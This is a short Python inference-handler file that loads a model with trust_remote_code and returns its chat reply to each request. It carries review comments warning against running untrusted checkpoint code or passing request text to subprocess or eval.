# text_classification / handler.py
# Source-page metadata (not part of the program): "Linsad's picture",
# commit "Upload handler.py" (4dee029, verified), no virus flagged, 1.07 kB.
import os
import subprocess
from typing import Dict, List, Any
from transformers import AutoTokenizer, AutoModel
class EndpointHandler:
    """Custom inference handler: loads a model once, then answers requests.

    The tokenizer and model are loaded in ``__init__``; each request is
    handled by ``__call__``, which forwards the prompt to the model's
    ``chat`` method.
    """

    def __init__(self, path=""):
        """Load the tokenizer and model found at *path*.

        Args:
            path: Location handed to ``from_pretrained`` for both the
                tokenizer and the model.
        """
        print(f"path is {path}")
        # NOTE(review): trust_remote_code=True runs Python code shipped with
        # the checkpoint -- only point this handler at repositories you trust.
        self.tokenizer = AutoTokenizer.from_pretrained(path, trust_remote_code=True)
        model = AutoModel.from_pretrained(path, trust_remote_code=True)
        # Half precision, moved to the GPU, and switched to evaluation mode.
        self.model = model.half().cuda().eval()

    def __call__(self, data: Dict[str, Any]) -> List[Dict[str, Any]]:
        """Answer one request with the model's chat reply.

        Args:
            data: Request payload; ``data["inputs"]`` must be the prompt
                string. The payload is not modified.

        Returns:
            A one-element list ``[{"response": ..., "history": ...}]`` that
            will be serialized and returned.

        Raises:
            ValueError: If ``inputs`` is missing, not a string, or blank.
        """
        inputs = data.get("inputs") if isinstance(data, dict) else data
        if not isinstance(inputs, str) or not inputs.strip():
            raise ValueError("'inputs' must be a non-empty string")

        # SECURITY: request text is untrusted. It must only ever be given to
        # the model -- never to subprocess/os/eval -- otherwise any client of
        # the endpoint can execute arbitrary programs on the host.
        # Presumably ``chat`` is supplied by the checkpoint's remote code and
        # returns a ``(response, history)`` pair -- confirm against the model.
        response, history = self.model.chat(self.tokenizer, inputs, history=[])
        return [{"response": response, "history": history}]